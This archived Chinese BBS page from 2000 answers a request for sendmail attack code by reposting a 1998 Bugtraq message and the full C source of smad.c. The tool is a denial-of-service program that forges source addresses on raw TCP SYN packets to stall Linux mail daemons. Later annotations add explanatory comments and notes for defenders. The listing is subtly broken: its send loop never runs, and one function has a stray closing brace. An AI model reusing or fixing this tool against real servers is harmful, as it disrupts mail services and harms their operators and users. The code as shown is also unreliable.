<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="380.htm">下一篇</a>]
<hr><p align="left"><small>发信人: VRGL (毕业设计做三维渲染----真苦!!!), 信区: Security <br>

标  题: Re: 请问哪儿可以下栽对sendmail进行攻击的源程序 <br>

发信站: BBS 水木清华站 (Sat Aug  5 08:50:47 2000) <br>

  <br>

/* <br>

Date: Tue, 3 Nov 1998 11:35:31 +0100 <br>

From: Salvatore Sanfilippo <antirez@SECLAB.COM> <br>

To: BUGTRAQ@netspace.org <br>

Subject: Sendmail/Qmail DoS <br>

Hi, <br>

This exploit shows how Sendmail and Qmail vulnerabilities can be <br>

exploited through spoofed packets. In fact the simple algorithm proposed by <br>

Michal Zalewski can be performed in this way: <br>

1. Attacker sends SYN from port X to victim, dst_port=25, spoof_addr SPOOFHOST <br>

       (victim sends SYN/ACK to SPOOFHOST) <br>

2. SPOOFHOST sends RST from port X to victim, dst_port=25 respecting sequence <br>

       numbers (in reply to the SYN/ACK from victim). <br>

   (victim got error on accept() - and enters 5 sec 'refusingconn' mode) <br>

3. Wait approx. 2 seconds <br>

4. Go to 1. <br>

The source is for Linux and there is a little bug so it doesn't work. <br>

p.s. This DoS works only against Linux boxes because Linux accept() returns <br>

     a different errno. <br>



anti. <br>

-- <br>

Salvatore Sanfilippo <br>

Intesis SECURITY LAB            Phone: +39-2-671563.1 <br>

Via Settembrini, 35             Fax: +39-2-66981953 <br>

I-20124 Milano  ITALY           Email: antirez@seclab.com <br>

--------------------------------------------------------- <br>

*/ <br>

/* <br>

 * smad.c - sendmail accept dos - <br>

 * <br>

 * Salvatore Sanfilippo [AntireZ] <br>

 * Intesis SECURITY LAB            Phone: +39-2-671563.1 <br>

 * Via Settembrini, 35             Fax: +39-2-66981953 <br>

 * I-20124 Milano  ITALY           Email: antirez@seclab.com <br>

 *                                         md5330@mclink.it <br>

 * <br>

 * compile it under Linux with gcc -Wall -o smad smad.c <br>

 * <br>

 * usage: smad fakeaddr victim [port] <br>

 */ <br>

#include <unistd.h> <br>



#include <string.h> <br>

#include <stdio.h> <br>

#include <stdlib.h> <br>

#include <arpa/inet.h> <br>

#include <sys/types.h> <br>

#include <sys/socket.h> <br>

#include <netinet/tcp.h> <br>

#include <netinet/ip.h> <br>

#include <netinet/in.h> <br>

#include <netdb.h> <br>

#include <unistd.h> <br>

// Pause between iterations of the loop in main(); the value is handed to <br>
// usleep(), so it is in microseconds (100000 us = 0.1 s). <br>

#define SLEEP_UTIME 100000 /* modify it if necessary */ <br>

// Size of the buffer built in main(): one IPv4 header followed by one TCP <br>
// header, with no options and no payload. <br>

#define PACKETSIZE (sizeof(struct iphdr) + sizeof(struct tcphdr)) <br>

// Byte offset of the TCP header inside the packet buffer. <br>

#define OFFSETTCP  (sizeof(struct iphdr)) <br>

// Byte offset of the IP header inside the packet buffer (start of buffer). <br>

#define OFFSETIP   (0) <br>

// Sums the 16-bit words at buf into an unsigned long, folds the carries back <br>
// into the low 16 bits and returns the bitwise complement, truncated to <br>
// u_short by the return type. <br>
// <br>
// buf    - start of the data, read as consecutive u_short values. <br>
// nwords - despite the name, the loop subtracts 2 per 16-bit word read, so the <br>
//          value is consumed as a byte count; main() passes <br>
//          12+sizeof(struct tcphdr). <br>
// <br>
// NOTE(review): an odd count is not handled specially; the last iteration <br>
// still reads a full 16-bit word, i.e. one byte past the stated length. <br>

u_short cksum(u_short *buf, int nwords) <br>

{ <br>

        unsigned long sum; <br>

        u_short *w = buf; <br>

        for (sum = 0; nwords > 0; nwords-=2) <br>

                sum += *w++; <br>

        // first fold: add the bits above 16 back into the low 16 bits <br>

        sum = (sum >> 16) + (sum & 0xffff); <br>



        // second fold: absorb a carry produced by the first fold <br>

        sum += (sum >> 16); <br>

        return ~sum; <br>

} <br>

// Fills *addr (treated as a struct sockaddr_in) for the given host and port. <br>
// <br>
// addr     - output; zeroed, then set to AF_INET with the port in network <br>
//            byte order. <br>
// hostname - first parsed by inet_addr() as a dotted-quad string; if that <br>
//            returns -1, gethostbyname() is tried instead. <br>
// port     - port number in host byte order. <br>
// <br>
// Does not return an error: on lookup failure it prints a message and <br>
// terminates the process with exit(-1). <br>
// <br>
// NOTE(review): inet_addr() also returns -1 for "255.255.255.255", so that <br>
// address takes the gethostbyname() path. gethostbyname() reports failures <br>
// through h_errno rather than errno, so the text perror() appends may be <br>
// unrelated to the actual lookup error. <br>

void resolver (struct sockaddr * addr, char *hostname, u_short port) <br>

{ <br>

        struct  sockaddr_in *address; <br>

        struct  hostent     *host; <br>

        address = (struct sockaddr_in *)addr; <br>

        (void) bzero((char *)address, sizeof(struct sockaddr_in)); <br>

        address->sin_family = AF_INET; <br>

        address->sin_port = htons(port); <br>

        address->sin_addr.s_addr = inet_addr(hostname); <br>

        if ( (int)address->sin_addr.s_addr == -1) { <br>

                host = gethostbyname(hostname); <br>

                if (host) { <br>

                        // NOTE(review): h_length bytes are copied without checking <br>
                        // that they fit in sin_addr; presumably 4 for an IPv4 <br>
                        // result - confirm. <br>

                        bcopy( host->h_addr, <br>

                        (char *)&address->sin_addr,host->h_length); <br>

                } else { <br>

                        perror("Could not resolve address"); <br>

                        exit(-1); <br>

                } <br>

        } <br>

        } <br>

} <br>

// Entry point. Reads "fakeaddr victim [port]" from argv, resolves both names, <br>
// and fills a stack buffer with one IPv4 header plus one TCP header carrying <br>
// the SYN flag, using argv[1] as the source address and argv[2] as the <br>
// destination. The TCP checksum is computed over a pseudo-header built here. <br>
// <br>
// The author's accompanying message states that the posted source contains a <br>
// bug so that it does not work; this annotation leaves the listing as posted. <br>
// <br>
// Defender's view: the header built below carries fixed values that can serve <br>
// as match criteria for this specific tool - TCP source port 3000, sequence <br>
// number 32089744, window 512, IP TTL 64, and an IP id restricted to 0..255 <br>
// (getpid() & 255) - on SYNs to port 25 (or the port given in argv[3]). <br>
// Because the source address is forged, source-address validation at network <br>
// edges (BCP 38 ingress filtering) is the network-level control; on the mail <br>
// host, the condition described in the message is the daemon pausing after <br>
// an accept() error, so the durable fix lies in how the daemon handles that <br>
// error. <br>

int main(int argc, char **argv) <br>

{ <br>

        // characters cycled through as a progress spinner <br>

        char runchar[] = "|/-\\"; <br>

        char packet[PACKETSIZE], <br>

        *fromhost, <br>

        *tohost; <br>

        u_short fromport        = 3000, <br>

                toport          = 25; <br>

        struct sockaddr_in local, remote; <br>

        // ip and tcp are views onto the same packet buffer at fixed offsets <br>

        struct iphdr    *ip     = (struct iphdr*)  (packet + OFFSETIP); <br>

        struct tcphdr   *tcp    = (struct tcphdr*) (packet + OFFSETTCP); <br>

        // Pseudo-header used only as input to the TCP checksum: the fields <br>
        // before tcpheader add up to 12 bytes (4+4+1+1+2), which is where the <br>
        // literal 12 used further down comes from. <br>

        struct  tcp_pseudohdr <br>

        { <br>

                struct in_addr saddr; <br>

                struct in_addr daddr; <br>

                u_char zero; <br>

                u_char protocol; <br>

                u_short lenght; <br>

                struct tcphdr tcpheader; <br>

        } pseudoheader; <br>

        int sock, result, runcharid = 0; <br>



        if (argc < 3) <br>

        { <br>

                printf("usage: %s fakeaddr victim [port]\n", argv[0]); <br>

                // NOTE(review): a usage error exits with status 0 <br>

                exit(0); <br>

        } <br>

        // NOTE(review): atoi() gives no error indication, and the result is <br>
        // stored in a u_short, so non-numeric or out-of-range input is <br>
        // silently converted or truncated. <br>

        if (argc == 4) <br>

                toport = atoi(argv[3]); <br>

        bzero((void*)packet, PACKETSIZE); <br>

        fromhost = argv[1]; <br>

        tohost = argv[2]; <br>

        resolver((struct sockaddr*)&local, fromhost, fromport); <br>

        resolver((struct sockaddr*)&remote, tohost, toport); <br>

        // Raw socket: on Linux this normally requires root or CAP_NET_RAW, <br>
        // so the call fails here for an unprivileged user. <br>

        sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); <br>

        if (sock == -1) { <br>

                perror("can't get raw socket"); <br>

                exit(1); <br>

        } <br>

        /* src addr */ <br>

        bcopy((char*)&local.sin_addr, &ip->saddr,sizeof(ip->saddr)); <br>

        /* dst addr */ <br>

        bcopy((char*)&remote.sin_addr,&ip->daddr,sizeof(ip->daddr)); <br>

        ip->version = 4; <br>



        // header length in 32-bit words <br>

        ip->ihl     = sizeof(struct iphdr)/4; <br>

        ip->tos     = 0; <br>

        ip->tot_len = htons(PACKETSIZE); <br>

        ip->id      = htons(getpid() & 255); <br>

        /* no flags */ <br>

        ip->frag_off = 0; <br>

        ip->ttl     = 64; <br>

        // 6 is the IP protocol number for TCP <br>

        ip->protocol = 6; <br>

        // left at 0; nothing in this listing computes the IP header checksum <br>

        ip->check   = 0; <br>

        tcp->th_dport = htons(toport); <br>

        tcp->th_sport = htons(fromport); <br>

        tcp->th_seq   = htonl(32089744); <br>

        tcp->th_ack   = htonl(0); <br>

        // TCP header length in 32-bit words <br>

        tcp->th_off   = sizeof(struct tcphdr)/4; <br>

        /* 6 bit reserved */ <br>

        tcp->th_flags = TH_SYN; <br>

        tcp->th_win   = htons(512); <br>

        /* start of pseudo header stuff */ <br>

        // NOTE(review): the size is written as 12+sizeof(struct tcphdr) <br>
        // rather than sizeof(pseudoheader); this assumes the struct has no <br>
        // padding - confirm. <br>

        bzero(&pseudoheader, 12+sizeof(struct tcphdr)); <br>

        pseudoheader.saddr.s_addr=local.sin_addr.s_addr; <br>

        pseudoheader.daddr.s_addr=remote.sin_addr.s_addr; <br>

        pseudoheader.protocol = 6; <br>



        pseudoheader.lenght = htons(sizeof(struct tcphdr)); <br>

        // th_sum is still 0 at this point (packet was zeroed above), so the <br>
        // copy of the TCP header fed to cksum() has a zero checksum field <br>

        bcopy((char*) tcp, (char*) &pseudoheader.tcpheader, <br>

                sizeof(struct tcphdr)); <br>

        /* end */ <br>

        tcp->th_sum   = cksum((u_short *) &pseudoheader, <br>

                                12+sizeof(struct tcphdr)); <br>

        /* 16 bit urg */ <br>

        // Loop body: hand the prepared buffer to sendto(), treat any return <br>
        // other than PACKETSIZE as failure, advance the spinner character, <br>
        // then sleep SLEEP_UTIME microseconds. <br>

        while (0) <br>

        { <br>

                result = sendto(sock, packet, PACKETSIZE, 0, <br>

                        (struct sockaddr *)&remote, sizeof(remote)); <br>

                if (result != PACKETSIZE) <br>

                { <br>

                        perror("sending packet"); <br>

                        // NOTE(review): a send failure exits with status 0 <br>

                        exit(0); <br>

                } <br>

                // backspace over the previous spinner character, print the next <br>

                printf("\b"); <br>

                printf("%c", runchar[runcharid]); <br>

                fflush(stdout); <br>

                runcharid++; <br>

                if (runcharid == 4) <br>

                        runcharid = 0; <br>



                usleep(SLEEP_UTIME); <br>

        } <br>

        return 0; <br>

} <br>

  <br>

【 在 volkswagon (痛哭的人) 的大作中提到: 】 <br>

: 如题 <br>

  <br>

  <br>

-- <br>

</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="380.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>
